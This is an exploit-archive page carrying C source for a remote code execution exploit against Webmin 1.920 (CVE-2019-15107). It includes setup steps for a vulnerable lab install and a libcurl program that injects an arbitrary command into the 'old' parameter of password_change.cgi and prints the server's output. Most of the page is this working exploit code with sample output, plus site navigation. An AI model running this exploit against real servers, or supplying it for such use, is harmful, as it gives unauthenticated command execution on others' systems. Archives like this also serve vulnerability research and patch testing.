Webmin 1.920 Remote Code Execution

Webmin 1.920 Remote Code Execution: Posted Sep 15, 2019; Authored by BoSSaLiNiE; Webmin version 1.920 remote code execution exploit that leverages the vulnerability noted in CVE-2019-15107.; tags | exploit, remote, code execution; advisories | CVE-2019-15107; SHA-256 | 233192a3d19175ea1314a59b24a433a47278e7d0fd3f5a72f4fdeb8334763b0e; Download | Favorite | View

Webmin 1.920 Remote Code Execution

////////////////////////////////////////////////////////////////////////////////////////////////
// Webmin 1.920 Remote Code Execution Exploit CVE_2019_15107.c muBoT Cut
// written in C by BoSSaLiNiE
//
// Step 1
// wget https://netix.dl.sourceforge.net/project/webadmin/webmin/1.920/webmin_1.920_all.deb
//
// Step 2
// dpkg -i webmin_1.920_all.deb
//
//
// Step 3
// sed -i s/passwd_mode=0/passwd_mode=2/g /etc/webmin/miniserv.conf;service webmin restart
//
// Step 4
// gcc CVE_2019_15107.c -o CVE_2019_15107 -lcurl
//
// ./CVE_2019_15107 10.0.0.14 "uptime"
// https://10.0.0.14:10000/password_change.cgi
// 16:16:38 up 22:15,  0 user,  load average: 0.00, 0.00, 0.00
//
///////////////////////////////////////////////////////////////////////////////////////////////

#include <stdlib.h>
#include <string.h>
#include <curl/curl.h>
#include <netinet/in.h>
#include <net/if.h>
#include <arpa/inet.h>

int main(int argc,char* argv[])
{
  CURLU *h;
  CURL *curl;
  CURLcode res;
  struct sockaddr_in servaddr;  /*  socket address structure  */ 
  curl_socket_t sockfd;

  char buffer[200];
  char scanip[20];
  char *host;
  char *path;
  char ref[100];
  char url[100];


  struct string {
    char *ptr;
    size_t len;
  };

  void init_string(struct string *s) {
    s->len = 0;
    s->ptr = malloc(s->len+1);
    if (s->ptr == NULL) {
      fprintf(stderr, "malloc() failed\n");
      exit(EXIT_FAILURE);
    }
    s->ptr[0] = '\0';
  }

  size_t writefunc(void *ptr, size_t size, size_t nmemb, struct string *s)
  {
    size_t new_len = s->len + size*nmemb;
    s->ptr = realloc(s->ptr, new_len+1);
    if (s->ptr == NULL) {
      fprintf(stderr, "realloc() failed\n");
      exit(EXIT_FAILURE);
    }
    memcpy(s->ptr+s->len, ptr, size*nmemb);
    s->ptr[new_len] = '\0';
    s->len = new_len;

    return size*nmemb;
  }


  curl_global_init(CURL_GLOBAL_DEFAULT);
  curl = curl_easy_init();

  if(curl) {
    curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 1L);
    struct curl_slist *headers=NULL;


    struct string s;
    init_string(&s);

    headers = curl_slist_append(headers, "Accept-Encoding: gzip, deflate");
    headers = curl_slist_append(headers, "Accept: */*");
    headers = curl_slist_append(headers, "Accept-Language: en");
    headers = curl_slist_append(headers, "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)");
    headers = curl_slist_append(headers, "Connection: close");
    headers = curl_slist_append(headers, "Cookie: redirect=1; testing=1; sid=x; sessiontest=1");
    //  headers = curl_slist_append(headers, "Referer: https://192.168.233.134:10000/session_login.cgi");      
    headers = curl_slist_append(headers, "Content-Type: application/x-www-form-urlencoded");
    headers = curl_slist_append(headers, "Content-Lenght: 60");
    headers = curl_slist_append(headers, "cache-control: no-cache");

    sprintf(url, "https://%s:10000/password_change.cgi", argv[1]);
    sprintf(ref, "https://%s:10000/session_login.cgi", argv[1]);

    curl_easy_setopt(curl, CURLOPT_REFERER, ref);
    curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers );
    curl_easy_setopt(curl, CURLOPT_VERBOSE, 0);
    curl_easy_setopt(curl, CURLOPT_URL, url);
    curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, writefunc);
    curl_easy_setopt(curl, CURLOPT_WRITEDATA, &s);

    char b64str[100000] = {0};
    sprintf(b64str, "user=rootxx&pam=&expired=2&old=%s&new1=test2&new2=test2",argv[2]);

    curl_easy_setopt(curl, CURLOPT_CUSTOMREQUEST, "POST");
    curl_easy_setopt(curl, CURLOPT_POSTFIELDS, b64str);
    curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0);
    curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0);
    //  curl_easy_setopt (curl, CURLOPT_TIMEOUT, 10L);

    res = curl_easy_perform(curl);

    //////////////////////////FILTER//////////////////////////

    //  puts(s.ptr);
    const char *x = s.ptr;
    const char *PATTERN1 = "<center><h3>Failed to change password : The current password is incorrect";
    const char *PATTERN2 = "</h3></center>";

    char *target = NULL;
    char *start, *end;

    if ( start = strstr( x, PATTERN1 ) )
    {
      start += strlen( PATTERN1 );
      if ( end = strstr( start, PATTERN2 ) )
      {
        target = ( char * )malloc( end - start + 1 );
        memcpy( target, start, end - start );
        target[end - start] = '\0';
      }
    }

    if ( target ) 
      puts(url);
    puts( target );

    free( target );

    free(s.ptr);


  }
  return 0;
}

Top Authors In Last 30 Days

Red Hat 275 files
indoushka 177 files
Jay Turla 150 files
Ubuntu 77 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Gentoo 25 files
Karn Ganeshen 23 files

File Archives

Systems

AIX (430)
Apple (2,115)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,125)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,592)
HPUX (881)
iOS (390)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,327)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,893)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,867)
UNIX (9,458)
UnixWare (188)
Windows (6,772)
Other

Webmin 1.920 Remote Code Execution

Webmin 1.920 Remote Code Execution

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Webmin 1.920 Remote Code Execution

Share This

Webmin 1.920 Remote Code Execution

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems